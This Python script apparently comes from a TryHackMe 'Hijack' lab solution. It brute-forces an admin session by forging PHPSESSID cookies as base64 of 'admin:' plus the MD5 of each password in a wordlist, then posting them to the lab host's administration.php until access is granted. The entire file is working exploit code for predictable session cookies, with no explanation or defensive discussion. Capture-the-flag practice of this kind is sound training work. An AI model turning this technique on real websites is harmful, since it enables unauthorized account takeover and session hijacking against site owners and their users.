#!/usr/bin/env python3

# Hijacking the admin user cookie on the web page of the tryhackme "hijack" machine.
# Author: H3g0c1v

from pwn import *
import requests, signal, sys, hashlib, base64

# Ctrl + C
def def_handler(sig, frame):
    print("\n[+] Saliendo ...")
    sys.exit(1)

signal.signal(signal.SIGINT, def_handler)

# Variables Globales
main_url = 'http://10.10.213.40/administration.php'
passlist = 'passwords_list.txt' 

def adminHijacking():
    p1 = log.progress("Admin session hijacking")
    p1.status("admin")

    s = requests.Session()
    f = open(passlist, "r")
    time.sleep(2)

    for password in f.readlines():
        password = password.strip()
        md5pass = hashlib.md5(password.encode()).hexdigest()
        userPass = "admin:" + md5pass
        cookie = base64.b64encode(userPass.encode()).decode()

        r = s.get(main_url)
        p1.status("admin : %s" % cookie)
        
        headers = {
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36',
            'Cookie': 'PHPSESSID=%s' % cookie
        }

        r = s.post(main_url, headers=headers)

        if "Access denied, only the admin can access this page." not in r.text:
            p1.success("admin:%s" % cookie)
            break

adminHijacking()
